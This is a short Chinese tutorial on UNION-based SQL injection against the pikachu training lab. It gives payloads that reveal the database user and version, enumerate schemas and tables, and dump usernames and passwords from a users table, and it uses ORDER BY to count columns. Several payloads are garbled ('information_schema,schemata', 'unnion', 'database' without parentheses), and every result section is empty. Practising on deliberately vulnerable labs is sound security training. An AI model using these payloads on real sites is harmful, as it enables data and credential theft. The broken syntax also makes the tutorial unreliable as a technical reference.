利用注入点让SQL注入语句执行读取数据库数据相关的操作!
以下均以pikachu 靶场的字符型注入为例进行介绍说明
一、读取用户名,数据库版本信息
在原URL后面添加如下代码:
sql
' union select user(),version()--+效果:
补充:判断查询的字段个数order by
这时,就需要在相应环境下进行测试判断:主要是使用order by来判断
在后面添加1,2,3,4,5,6....进行测试,直到不再报错 !就判断出了其查询字段个数!
如下:
二、读取mysql所有库名
在原URL后面添加如下语句:
sql
' union select 1,group_concat(schema_name) from information_schema,schemata+--+效果:
三、读取pikachu库的所有表名
在原URL后面添加如下语句:
sql
'unnion select 1,group_concat(table_name) from information_schema.tables where table_schema=database+--+效果:
四、读取所有字段数据
在原URL后面添加如下语句:
sql
' union select 1,group_concat(id,0x7c,username,0x7c,password,0x7c,level,0x7c) from users+--+效果:
